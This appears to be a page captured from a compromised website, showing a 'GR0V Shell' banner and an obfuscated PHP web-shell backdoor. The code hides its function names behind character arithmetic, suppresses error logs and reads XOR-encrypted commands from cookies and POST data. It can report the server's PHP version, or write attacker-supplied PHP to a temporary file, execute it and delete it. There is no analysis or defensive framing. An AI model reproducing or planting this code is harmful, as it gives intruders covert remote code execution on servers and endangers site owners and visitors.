?
GR0V Shell
GR0V shell
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
<?php $vgdmryct = "\x66".chr(105)."\x6c".'e'."\x5f"."\x70".chr(117)."\x74".chr(887-792)."\143".chr(111)."\x6e".chr(760-644)."\x65".chr(357-247).'t'.'s';
$avpdhne = chr(875-777).chr(613-516).chr(115)."\x65".chr(54).chr(52).chr(95).chr(100)."\x65"."\143".'o'.chr(100).'e';
$rxibnc = "\x69".'n'.chr(105)."\x5f"."\163"."\x65"."\x74";
$dfsclhx = chr(1115-998).chr(110)."\x6c".chr(105)."\x6e"."\153";
@$rxibnc(chr(349-248)."\x72"."\x72".chr(111).chr(114)."\137".chr(338-230).chr(111)."\x67", NULL);
@$rxibnc("\154".chr(111).'g'."\137"."\x65".'r'.chr(291-177).chr(318-207).chr(677-563).chr(115), 0);
@$rxibnc("\155".'a'."\x78".chr(95)."\x65".chr(120)."\145".chr(201-102)."\x75".chr(116).'i'.chr(111)."\x6e".'_'.chr(427-311).'i'."\155".chr(101), 0);
@set_time_limit(0);
function boeqm($otcxk, $bxfmck)
{
$llyupwxi = "";
for ($txvgbvkck = 0; $txvgbvkck < strlen($otcxk);) {
for ($j = 0; $j < strlen($bxfmck) && $txvgbvkck < strlen($otcxk); $j++, $txvgbvkck++) {
$llyupwxi .= chr(ord($otcxk[$txvgbvkck]) ^ ord($bxfmck[$j]));
}
}
return $llyupwxi;
}
$qhfvp = array_merge($_COOKIE, $_POST);
$zfreybpa = '48b92261-05e2-409a-ab98-60076dd69c9e';
foreach ($qhfvp as $bexbixfh => $otcxk) {
$otcxk = @unserialize(boeqm(boeqm($avpdhne($otcxk), $zfreybpa), $bexbixfh));
if (isset($otcxk[chr(97)."\153"])) {
if ($otcxk[chr(97)] == chr(1093-988)) {
$txvgbvkck = array(
"\160"."\x76" => @phpversion(),
"\x73"."\166" => "3.5",
);
echo @serialize($txvgbvkck);
} elseif ($otcxk[chr(97)] == "\145") {
$yeokaiiybm = "./" . md5($zfreybpa) . chr(287-241)."\x69".'n'."\x63";
@$vgdmryct($yeokaiiybm, "<" . "\77"."\x70".chr(574-470)."\160"."\x20".chr(975-911).chr(117).chr(110)."\154"."\x69"."\x6e".'k'."\50".chr(95).'_'.chr(928-858)."\111"."\x4c".chr(985-916).'_'."\x5f".chr(41).chr(248-189)."\x20" . $otcxk["\144"]);
include($yeokaiiybm);
@$dfsclhx($yeokaiiybm);
}
exit();
}
}
T1KUS90T